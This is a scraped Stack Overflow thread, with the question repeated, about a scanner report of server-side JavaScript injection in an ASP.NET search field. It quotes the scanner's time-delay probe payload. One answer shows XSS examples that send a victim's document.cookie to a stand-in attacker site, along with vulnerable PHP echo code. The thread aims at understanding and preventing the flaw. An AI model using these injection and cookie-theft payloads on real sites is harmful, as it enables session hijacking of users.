asp.net - Server Side JavaScript Code Injection Attack - Stack Overflow

A security scan of an ASP.NET web site we are developing reported the following on an input field used for a search:

"The ctl00%24txtTopQckSearch parameter appears to be vulnerable to server-side JavaScript code injection attacks. The submitted value appears to be placed into a dynamically evaluated JavaScript statement, within a single-quoted context.

The payload '+(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+' was submitted in the ctl00%24txtTopQckSearch parameter. The application took 7641 milliseconds to respond to the request, pared with 5625 milliseconds for the original request, indicating that the injected JavaScript code caused a time delay.

Please note that to manually reproduce this behavior using the reported request, you will need to change the name of the canary variable, which is currently cb715."

My questions are:

What is "Server-Side JavaScript code injection" (as opposed to Client-Side Injection -XSS)?

How can I manually recreate the server side attack described above?

How can it be prevented?

Thanks!

A security scan of an ASP.NET web site we are developing reported the following on an input field used for a search:

"The ctl00%24txtTopQckSearch parameter appears to be vulnerable to server-side JavaScript code injection attacks. The submitted value appears to be placed into a dynamically evaluated JavaScript statement, within a single-quoted context.

The payload '+(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+' was submitted in the ctl00%24txtTopQckSearch parameter. The application took 7641 milliseconds to respond to the request, pared with 5625 milliseconds for the original request, indicating that the injected JavaScript code caused a time delay.

Please note that to manually reproduce this behavior using the reported request, you will need to change the name of the canary variable, which is currently cb715."

My questions are:

What is "Server-Side JavaScript code injection" (as opposed to Client-Side Injection -XSS)?

How can I manually recreate the server side attack described above?

How can it be prevented?

Thanks!

• javascript
• asp
• security

Share Follow edited Jan 10, 2015 at 17:56 Jobrocol asked Jan 10, 2015 at 17:37 JobrocolJobrocol 9041111 silver badges1313 bronze badges 2

• 2 It means that the injected code appeared to actually execute on your page. The security scan timed the function with and without the injected code, observed that it took longer with the code than without, and concluded that the code actually executed. – Robert Harvey Commented Jan 10, 2015 at 17:39
• 1 Code injection is where you find an input on the page that normally just takes a number or a string, and stick some actual Javascript code in there. If it executes, hilarity ensues. – Robert Harvey Commented Jan 10, 2015 at 17:40

Add a ment  | 

2 Answers 2

Sorted by: Reset to default 3

What is "Server-Side JavaScript code injection" (as opposed to Client-Side Injection -XSS)?

It is a vulnerability that allows an attacker to execute their JavaScript code on your server (as opposed to in someone's browser).

How can I manually recreate the server side attack described above?

The report refers to a txtTopQckSearch control and says that it passed in the value +(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+ for that control.

So you can try to recreate it by

1. Figuring out which page is using a control with that name
2. Entering that JavaScript into that control (but changing the two occurrences of cb715 to a different name)
3. Submitting the page

If the scan's findings are correct, that request should take slightly longer than a request that doesn't use that value.

How can it be prevented?

Track down the txtTopQckSearch control and ensure that values received via that control are never concatenated into any code that is executed on your server.

I think it's entirely possible that this is a red herring and that the request just took a bit longer due to some fluctuation on your server (the fact that the "safe" request to that page took >5 seconds suggests that the page might have some performance problems).

One good reason to suspect that it is a red herring is that if that code had run to pletion before your server sent back a response, the difference in response time would have been 20 seconds as opposed to the 2 second difference that the scan observed.

So investigate to see if there are any possible security holes with that control, and if not, write it off for now as a false positive.

They can inject JavaScript code. It's an XSS vulnerability.

If you have this code (don't know ASP sorry):

<div><?php echo $_GET["foo"];?></div>

It will pretty much print whatever you pass as foo. So if you get someone to load:

http://yoursite./index.php?foo=<script>document.location.href="http://mywebsite./?cookie=" + document.cookie</script>

I have now stolen their session. It injects a piece of JavaScript code that reads the cookies and sends it to my website.

A similar approach exists in JavaScript directly:

<script>var data = <?php echo $_GET["foo"];?>;</script>

Now if the value of foo is something like

"";document.location.href="http://mywebsite./?cookie=" + document.cookie`

I have again stolen cookies.

The way to avoid XSS is to always always always escape untrusted content. In PHP the functions are htmlspecialchars (for HTML) and json_encode (for JavaScript).

---

They detect the XSS vulnerability by injecting code that takes a long time to execute (creating 20000 Date objects) and paring how long it takes to load the page.